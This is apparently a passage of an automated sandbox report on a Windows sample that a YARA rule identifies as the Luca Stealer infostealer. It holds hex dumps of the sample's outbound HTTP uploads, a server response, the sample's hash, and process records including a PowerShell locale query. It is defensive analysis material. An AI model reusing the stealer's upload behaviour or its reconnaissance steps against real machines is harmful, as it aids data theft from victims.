                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 85 8b 97 d8 3f 3c 04 60 a0 70 89 05 87 ee 18 54 00 40 80 cd fd fe 78 bc 86 5f 5a dd c0 bf 86 78 d1 d8 06 40 12 f7 b3 cd bf 97 df e8 07 c1 06 12 9c e0 04 12 10 a8 e7 de 67 fc 19 21 a1 12 14 09 45 a0 08 42 42 11 84 02 24 a2 04 52 10 0a 88 40 0a 14 01 0a 22 04 2a d4 5f fb 48 50 80 c4 fd 52 bc 70 36 2f 8c 9c fc 57 f9 da e5 0f f0 c1 1f f4 41 8c d3 c4 bf e4 e7 9e 70 c4 cf 3d f1 90 df bb 75 c5 33 76 27 1e e8 41 c7 2b af f1 a0 39 6f fe e8 0d de e2 51 1b fc 4b ba ae f2 c5 5f f2 a5 7c d6 b5 1f ce 7f 36 db 3c 50 f0 9c 6c 03 20 09 49 34 9b e7 e7 eb 86 1f e0 83 3f e8 83 18 a7 89 7f 1b 83 c1 fc eb 74 5d e5 8b bf e4 4b f9 ac 33 1f ca 8b 42 e6 59 6c f3 9f c9 36 cf 4d 86 af f5 0f f3 c1 1f f4 41 8c d3 c4 bf 8d c1 60 fe 75 ba ae f2 c5 5f f2 a5 7c f6 b1 0f e2 45 65 9b ff 48
                                      Data Ascii: ?<`pT@x_Zx@g!EBB$R@"*_HPRp6/WAp=u3v'A+9oQK_|6<Pl I4?t]K3BYl6MA`u_|EeH
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 80 24 24 61 9b cc 04 20 22 68 ad 21 09 49 3c 90 6d 00 02 91 99 00 48 c2 36 b6 b1 8d 24 24 61 9b fb 45 04 92 b0 4d 66 52 4a c1 36 d3 34 61 9b 5a 2b 00 99 89 24 ee 27 09 db d8 e6 81 fa 52 b1 4d 66 62 1b 00 49 44 04 92 68 ad 61 1b 00 49 48 42 12 99 89 6d 00 22 02 49 64 26 b6 91 44 44 20 89 36 4e 48 02 c0 36 0f 94 99 00 94 52 88 08 5a 6b b4 d6 00 88 08 24 11 11 b4 d6 88 08 a6 69 a2 94 42 d7 75 8c e3 88 6d 5a 6b 44 04 11 81 24 32 13 db 00 48 a2 50 b0 8d 6d 6c 93 99 48 22 22 88 08 32 13 db 48 a2 d6 8a 6d a6 69 c2 36 11 41 29 05 db d8 c6 36 99 c9 fd 24 31 9b cd 98 a6 89 cc 24 22 b0 4d 6b 0d 80 5a 2b a5 14 5a 6b 64 26 00 b6 b1 8d 24 22 82 fb d9 26 33 b1 4d 44 00 60 9b 5a 0a ad 35 32 93 88 40 12 92 78 20 49 dc cf 36 b6 91 04 40 66 02 20 89 88 00 20 33 91 44 44 d0
                                      Data Ascii: $$a "h!I<mH6$$aEMfRJ64aZ+$'RMfbIDhaIHBm"Id&DD 6NH6RZk$iBumZkD$2HPmlH""2Hmi6A)6$1$"MkZ+Zkd&$"&3MD`Z52@x I6@f 3DD
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: de 84 fb 3d 83 af 79 fb f7 e0 a3 7f e9 6f 81 f7 e0 17 0f 3f 9a 27 bd da c3 f9 e8 3f fc 40 7e d1 9f c0 93 de fe fd f8 e8 c7 01 7e 43 7e f1 f1 ef c1 93 de fe 3d f8 18 bf 06 3c e6 35 e1 d1 af c1 bf da 13 7e 0f 3f 7e 97 5f fc 89 57 e6 49 6f ff 1e 7c 8c 5f 03 1e f3 9a 08 91 8f bf c8 2f fe c4 2b f3 a4 57 7b 10 1f fd 87 1f c8 2f fa 13 78 d2 1b be 3e 1f fd d7 80 5f 9c af fe e3 8f e1 71 af fc 7e 7c ab 00 de 9e 5f bc ef c3 78 d2 ab 3d 94 8f fe c3 0f e4 17 fd 09 3c e9 cd df 8e 8f de 7f 29 78 d0 4b c2 63 5f 13 9e f1 b7 f0 8c 8e 5f fc c5 d7 e1 49 6f fe 56 7c cc fe 4b c2 83 5f 1a 3d f6 b5 89 a3 5d 7c b8 c9 cf 7d f9 2b f2 26 3c d3 ef 7e 15 f1 c1 3f cd 07 7c c3 ef f0 2d e5 ab d0 a7 ff 25 1c 5d 82 c3 5d 3e f0 5b 7e 97 6f e1 ab d0 a7 cd f9 c5 df 7b 7b 9e f4 31 5f cd 47 df
                                      Data Ascii: =yo?'?@~~C~=<5~?~_WIo|_/+W{/x>_q~|_x=<)xKc__IoV|K_=]|}+&<~?|-%...[~o{{1_G
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 11 d8 a6 b5 46 57 2a 92 90 44 66 92 99 64 26 b6 b9 5f 44 10 11 00 d8 06 20 33 b1 8d 24 00 6c 93 99 00 94 52 90 04 80 6d 24 21 09 db 64 26 00 92 90 84 6d 6a ad d8 66 9a 26 6c 53 4a 01 20 33 a9 b5 d2 5a c3 36 f7 b3 0d 40 44 90 99 44 04 11 81 6d 6c 23 09 00 db 28 4d ad 15 49 b4 d6 68 ad 01 10 11 48 a2 b5 86 24 1e 48 12 92 90 44 66 72 3f 49 48 02 c0 36 b6 11 df 7f 64 fe 07 93 f9 6f 65 9b 17 46 e6 df c5 e2 df cf e6 05 92 78 61 a4 c2 bf 87 f9 17 48 60 03 80 cd 73 90 c0 46 12 2f 48 ad 95 fb d9 06 c0 36 cf 92 c6 36 00 b6 b1 0d 36 d8 5c 26 71 3f 21 1e 48 12 e9 89 17 26 cc 0b 94 e2 79 d9 00 c8 bc 50 32 97 59 fc 87 b2 cd 03 c9 fc 87 b2 cd 03 49 e2 7e b6 f9 d7 0a 9e 93 6d fe 2b c9 3c 8b 6d fe 3b d9 e6 5f 4b e6 45 66 9b e7 60 83 c4 bf 87 52 fc 67 92 79 16 db 3c 0f 25
                                      Data Ascii: FW*Dfd&_D 3$lRm$!d&mjf&lSJ 3Z6@DDml#(MIhH$HDfr?IH6doeFxaH`sF/H666\&q?!H&yP2YI~m+<m;_KEf`Rgy<%
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 22 02 db 48 02 c0 36 b6 b1 8d 6d 00 a2 16 24 41 9a 69 9a b0 4d 29 85 88 00 60 9a 26 24 51 15 48 02 c0 36 b6 b1 4d 29 05 db dc 4f 12 00 99 49 66 32 9b cd 18 c7 11 80 88 a0 b5 c6 34 4d 44 04 b3 d9 8c d6 1a b6 b1 cd fd 6c 13 11 44 04 00 b6 b1 0d 80 24 00 6c 03 e0 4c 22 02 49 d8 e6 81 6c 63 9b 88 20 33 c9 4c 6a ad 48 a2 b5 86 6d ba ae 63 9a 26 6c 53 6b 05 60 1c 47 00 6a ad b4 d6 90 84 24 24 01 60 1b db d8 a6 2b 15 db 64 26 b6 79 6e 11 41 66 02 10 11 00 64 26 00 11 81 6d 6c 03 20 09 00 db 00 44 04 92 b0 cd fd 32 13 db 00 94 52 88 08 32 13 db 00 d8 c6 36 00 11 81 24 86 61 20 22 a8 b5 92 99 64 26 11 81 24 32 93 88 40 12 b6 b1 8d 6d 24 21 09 a5 79 a0 88 00 20 33 b1 4d ad 95 69 9a 00 90 44 6b 0d 49 44 04 00 92 b0 0d 80 24 00 6c 03 20 09 e9 07 57 e6 99 6c f3 3f 82
                                      Data Ascii: "H6m$AiM)`&$QH6M)OIf24MDlD$lL"Ilc 3LjHmc&lSk`Gj$$`+d&ynAfd&ml D2R26$a "d&$2@m$!y 3MiDkID$l Wl?
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 13 80 d9 d7 1e f2 dc 6c 03 20 89 fb d9 e6 bf cb 77 f3 e3 bc c7 7b bc 07 ad 25 cf 66 cc 73 13 3f fb f8 03 7e f6 f1 87 fc ee ad 4b 9e b1 3b f1 40 0f 3a 5e 79 cd 07 2f 78 cb c7 6c f0 16 8f da 04 c0 3c 37 83 c1 40 57 2b 5f ff 0d df c0 c7 1c 7b 7f 9e af 10 48 44 04 00 25 3a 9e 2f 1b 03 d9 1a 69 23 c0 36 d8 60 03 80 13 6c 5e a8 34 f7 db 38 ff 35 f4 87 bf c9 7f a4 77 7a a9 37 e0 eb de ea e3 f9 f7 f8 ac cf f8 54 be f8 a1 9f c6 bf 49 9a ff 56 69 fe 3d 6c f3 ef 11 0e fe 3d 6c f3 1f c5 36 cf 4d e6 85 92 84 6d 1e c8 36 2f aa e0 85 b3 cd bf 96 6d 64 fe 53 d8 e6 81 64 fe d3 d9 26 cc f3 90 44 66 f2 6f 21 89 cb 52 bc 30 b6 f9 f7 08 fe 75 6c f3 af 92 e6 3f 92 6d fe ad 6c 73 3f 99 17 2a b8 a2 d9 3c 50 f0 82 d9 46 06 49 bc 20 b6 f9 d7 08 f3 42 d9 c6 36 0f 64 9b fb 05 e2 45
                                      Data Ascii: l w{%fs?~K;@:^y/xl<7@W+_{HD%:/i#6`l^485wz7TIVi=l=l6Mm6/mdSd&Dfo!R0ul?mls?*<PFI B6dE
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 5a 43 12 00 b6 91 84 24 5a 6b 00 48 22 22 90 84 6d 32 13 80 88 20 0c b6 b9 9f 24 24 61 1b 80 cc c4 36 b6 91 44 44 10 11 48 42 12 d3 38 52 4a a1 b5 46 6b 8d 52 0a 11 81 6d 00 32 93 07 92 44 66 22 89 5a 2b ad 35 6c 63 1b 00 db dc 4f 12 92 b8 9f 6d 6c 03 20 89 88 80 34 11 01 40 66 92 99 48 22 22 28 a5 30 0c 03 00 92 00 b0 8d 6d 24 21 09 4f 0d db 48 a2 d6 4a 44 90 99 d8 c6 36 ad 35 24 21 89 07 92 84 24 32 13 db 3c 90 24 6c 93 99 d4 52 b0 4d 66 02 10 11 44 04 b6 c9 4c 00 6c 23 89 88 20 0c 99 89 24 4a 29 ac d7 6b 22 02 49 48 82 34 00 92 00 68 4e ee 27 89 e7 66 9b fb 49 42 12 00 b6 b1 4d 0d 91 99 64 26 99 89 24 22 02 49 dc cf 36 b6 b9 9f 6d ee 57 4a 07 40 66 02 50 4a c1 36 ad 35 22 82 d6 1a 11 81 24 00 32 13 00 49 48 82 96 94 52 68 ad 11 11 d8 26 33 e9 ba 8e cc
                                      Data Ascii: ZC$ZkH""m2 $$a6DDHB8RJFkRm2Df"Z+5lcOml 4@fH""(0m$!OHJD65$!$2<$lRMfDLl# $J)k"IH4hN'fIBMd&$"I6mWJ@fPJ65"$2IHRh&3
                                      2024-06-01 16:51:35 UTC389INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Sat, 01 Jun 2024 16:51:35 GMT
                                      Content-Type: application/json
                                      Content-Length: 1274
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:12:50:36
                                      Start date:01/06/2024
                                      Path:C:\Users\user\Desktop\cOQD62FceM.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\cOQD62FceM.exe"
                                      Imagebase:0x7ff747670000
                                      File size:5'484'544 bytes
                                      MD5 hash:AF412B399914B80044340ADE572BF2AB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:12:51:12
                                      Start date:01/06/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:12:51:12
                                      Start date:01/06/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      No disassembly